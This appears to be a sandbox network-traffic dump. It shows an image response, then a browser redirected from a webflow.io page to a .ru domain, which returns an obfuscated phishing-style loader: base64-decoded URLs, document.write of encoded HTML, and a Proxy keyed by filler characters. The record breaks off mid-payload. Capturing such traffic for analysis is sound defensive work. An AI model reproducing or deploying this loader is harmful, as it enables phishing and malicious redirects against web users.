                                                  2025-03-28 12:42:43 UTC1369INData Raw: f8 f8 f8 ff f8 f8 f8 ff f8 f8 f8 ff f7 f7 f7 ff 8e 8a 86 ff 37 30 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 38 30 29 ff 50 49 43 ff e0 e0 df ff f8 f9 f9 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f9 f9 f9 ff f9 f9 f9 ff e2 e1 e0 ff 9a 96 93 ff 4b 44 3e ff 44 3d 36 ff c9 c7 c5 ff f9 fa fa ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f9 f9 f9 ff d6 d5 d4 ff 4f 49 42 ff 38 31 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b
                                                  Data Ascii: 70)92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+80)PICKD>D=6OIB81)92+92+92+92+92+92+92+92+92+
                                                  2025-03-28 12:42:43 UTC1369INData Raw: f9 f9 ff de dd dc ff 56 50 4a ff 37 30 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 38 31 2a ff 4b 45 3f ff c0 be bc ff d3 d2 d1 ff d2 d1 d0 ff d2 d1 d0 ff d1 cf ce ff d9 d8 d6 ff f5 f4 f4 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff 9c 99 96 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff
                                                  Data Ascii: VPJ70)92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+81*KE?92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                  2025-03-28 12:42:43 UTC1369INData Raw: 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 3c 36 2f ff 53 4d 47 ff 57 51 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 57 51 4b ff 50 4a 44 ff 3b 34 2d ff 38 31 2a ff 41 3a 33 ff 56 50 4a ff 56 51 4b ff 56 50 4b ff 57 51 4b ff 54 4e 48 ff 3f 38 31 ff 39 32 2a ff 3a 33 2d ff 50 4a 44 ff 57 51 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 57 51 4b ff 4f 49 43 ff 3a 33 2c ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                  Data Ascii: +92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+<6/SMGWQKVPKVPKVPKWQKPJD;4-81*A:3VPJVQKVPKWQKTNH?8192*:3-PJDWQKVPKVPKVPKVPKWQKOIC:3,92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                  2025-03-28 12:42:43 UTC1369INData Raw: ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32
                                                  Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92
                                                  2025-03-28 12:42:43 UTC1369INData Raw: 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b f3 39 32 2b 89 39 32 2b f4 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b
                                                  Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                  2025-03-28 12:42:43 UTC1369INData Raw: 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff
                                                  Data Ascii: 2+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                  2025-03-28 12:42:43 UTC1369INData Raw: 2b ff 39 32 2b ff 3c 35 2e ff 54 4e 48 ff 76 72 6d ff b2 b0 ad ff eb ea ea ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f3 f3 f3 ff f6 f6 f6 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff ef ef ef ff 72 6d 68 ff 36 2f 28 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 3f 39 32 ff 68 63 5d ff 6e 69 64 ff 74 6f 6b ff b1 ae ab ff f5 f5 f5 ff f7 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff fa fa fa ff c0 be bc ff 41 3b 34 ff 38 31 2a ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                  Data Ascii: +92+<5.TNHvrmrmh6/(92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+?92hc]nidtokA;481*92+92+92+92+92+92+92+92+92+92+92+92+9


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.449753104.21.73.2124435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:43:06 UTC738OUTGET /zXMKsj/ HTTP/1.1
                                                  Host: fgof.koxicarev.ru
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  Referer: https://littlestownseniorhighschool.webflow.io/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:43:06 UTC1248INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:43:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, private
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K4CojpyObgS6u7k%2BLMyiyYzlE4Y0dRq46ZenrBUFzcDiO44gRzMP4kaR2qgfZnMHEtG2uO7LDB4AZf4nPph1YtYlYWdLqXMYQjR5LaPSnezdzd5xHqcWQnD5xXIQdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10492&min_rtt=9604&rtt_var=856&sent=511&recv=154&lost=0&retrans=1&sent_bytes=613424&recv_bytes=26742&delivery_rate=3342069&cwnd=382&unsent_bytes=0&cid=0bfce0ae4a6d2938&ts=35215&x=0"
                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6ImhCLzAwMU1aWVgxU3VNTmFCaExpdGc9PSIsInZhbHVlIjoiWEV1UVB5REEzdEhSSXVOK0dzS3F3UHZITkdLNXg4YmtFZVMvVHNoTXZVb04reFJBck4velpFYVNGSlQ2V3lINXlHNU5hSG55cDRwYWs3cTQ4cDlvMkFHNFhuM3NVWlJWYktST2xXMzJMZUV2RFg3MEUwVFpRNzRQMjdQSmwrbDEiLCJtYWMiOiI3OTdjZWM2NTQ1YjhkNDFkOTczYjZkZjIzMGNjZjI0N2E2NzExMjA1OTU2NDQ3ZTkyYjM4NzYxYjQ3NWFiNmEyIiwidGFnIjoiIn0%3D; expires=Fri, 28-Mar-2025 14:43:06 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                  2025-03-28 12:43:06 UTC734INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 46 53 63 32 6b 30 57 57 74 4c 55 31 6b 77 52 48 70 70 52 48 6c 57 4e 46 49 79 64 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 6d 68 6f 51 56 41 35 54 31 46 68 56 7a 56 6a 59 54 5a 4d 54 6e 68 51 4d 48 5a 6a 57 48 45 30 4f 47 68 4b 56 56 4a 59 57 58 6c 56 5a 57 31 49 4f 58 64 76 4b 32 64 42 51 31 5a 5a 57 6c 46 32 51 32 52 45 53 31 52 75 62 6b 52 31 54 55 52 46 54 32 4e 72 52 57 4e 68 51 57 31 7a 4c 33 4a 34 64 33 42 47 51 56 51 31 4f 47 38 34 59 6e 46 74 64 58 70 58 63 44 52 46 55 32 46 4e 59 33 64 72 55 48 4e 7a 4f 48 63 35 4d 6c 49 7a 61 45 6c 4e 63 6d 6f 77 5a 7a 59 31 4f 45 51 34 56 57 6c 4f 4e 6d 6f 79 4d 55 74 79 4c 32 4d
                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImFSc2k0WWtLU1kwRHppRHlWNFIydmc9PSIsInZhbHVlIjoiNmhoQVA5T1FhVzVjYTZMTnhQMHZjWHE0OGhKVVJYWXlVZW1IOXdvK2dBQ1ZZWlF2Q2RES1RubkR1TURFT2NrRWNhQW1zL3J4d3BGQVQ1OG84YnFtdXpXcDRFU2FNY3drUHNzOHc5MlIzaElNcmowZzY1OEQ4VWlONmoyMUtyL2M
                                                  2025-03-28 12:43:06 UTC1369INData Raw: 37 66 66 39 0d 0a 3c 73 63 72 69 70 74 3e 0a 71 4a 79 44 58 44 6d 70 58 44 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 78 55 6b 63 75 61 32 39 34 61 57 4e 68 63 6d 56 32 4c 6e 4a 31 4c 33 70 59 54 55 74 7a 61 69 38 3d 22 29 3b 0a 4a 58 69 46 46 48 56 74 6f 76 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 4d 54 71 58 51 64 67 44 50 76 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 71 4a 79 44 58 44 6d 70 58 44 20 3d 3d 20 4a 58 69 46 46 48 56 74 6f 76 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 4d 54 71 58 51 64 67 44 50 76 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f
                                                  Data Ascii: 7ff9<script>qJyDXDmpXD = atob("aHR0cHM6Ly8xUkcua294aWNhcmV2LnJ1L3pYTUtzai8=");JXiFFHVtov = atob("bm9tYXRjaA==");MTqXQdgDPv = atob("d3JpdGU=");if(qJyDXDmpXD == JXiFFHVtov){document[MTqXQdgDPv](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+Cjxo
                                                  2025-03-28 12:43:06 UTC1369INData Raw: 38 74 63 32 56 73 5a 57 4e 30 61 57 39 75 65 79 31 33 5a 57 4a 72 61 58 51 74 64 47 39 31 59 32 67 74 59 32 46 73 62 47 39 31 64 44 70 75 62 32 35 6c 4f 79 31 33 5a 57 4a 72 61 58 51 74 64 58 4e 6c 63 69 31 7a 5a 57 78 6c 59 33 51 36 62 6d 39 75 5a 54 73 74 61 32 68 30 62 57 77 74 64 58 4e 6c 63 69 31 7a 5a 57 78 6c 59 33 51 36 62 6d 39 75 5a 54 73 74 62 57 39 36 4c 58 56 7a 5a 58 49 74 63 32 56 73 5a 57 4e 30 4f 6d 35 76 62 6d 55 37 4c 57 31 7a 4c 58 56 7a 5a 58 49 74 63 32 56 73 5a 57 4e 30 4f 6d 35 76 62 6d 55 37 64 58 4e 6c 63 69 31 7a 5a 57 78 6c 59 33 51 36 62 6d 39 75 5a 58 31 41 4c 58 64 6c 59 6d 74 70 64 43 31 72 5a 58 6c 6d 63 6d 46 74 5a 58 4d 67 63 47 39 77 65 7a 41 6c 65 33 52 79 59 57 35 7a 5a 6d 39 79 62 54 70 7a 59 32 46 73 5a 53 67 77 4b
                                                  Data Ascii: 8tc2VsZWN0aW9uey13ZWJraXQtdG91Y2gtY2FsbG91dDpub25lOy13ZWJraXQtdXNlci1zZWxlY3Q6bm9uZTsta2h0bWwtdXNlci1zZWxlY3Q6bm9uZTstbW96LXVzZXItc2VsZWN0Om5vbmU7LW1zLXVzZXItc2VsZWN0Om5vbmU7dXNlci1zZWxlY3Q6bm9uZX1ALXdlYmtpdC1rZXlmcmFtZXMgcG9wezAle3RyYW5zZm9ybTpzY2FsZSgwK
                                                  2025-03-28 12:43:06 UTC1369INData Raw: 37 43 6d 4e 76 62 6e 4e 30 49 48 42 79 62 33 68 35 49 44 30 67 62 6d 56 33 49 46 42 79 62 33 68 35 4b 48 74 39 4c 43 42 47 65 55 78 76 62 48 46 35 63 32 39 71 4b 54 73 4b 63 48 4a 76 65 48 6c 62 49 75 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f
                                                  Data Ascii: 7CmNvbnN0IHByb3h5ID0gbmV3IFByb3h5KHt9LCBGeUxvbHF5c29qKTsKcHJveHlbIu++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oO++oO
                                                  2025-03-28 12:43:06 UTC1369INData Raw: 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b
                                                  Data Ascii: oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpOOFpO++oO++oO++oOOFpOOFpOOFpOOFpOOFpO++oO++oO++oO++oOOFpO++oO++oO+
                                                  2025-03-28 12:43:06 UTC1369INData Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b
                                                  Data Ascii: O++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpO++
                                                  2025-03-28 12:43:06 UTC1369INData Raw: 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f
                                                  Data Ascii: OFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++o
                                                  2025-03-28 12:43:06 UTC1369INData Raw: 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f
                                                  Data Ascii: +oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oO++oO++oO
                                                  2025-03-28 12:43:06 UTC1369INData Raw: 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b
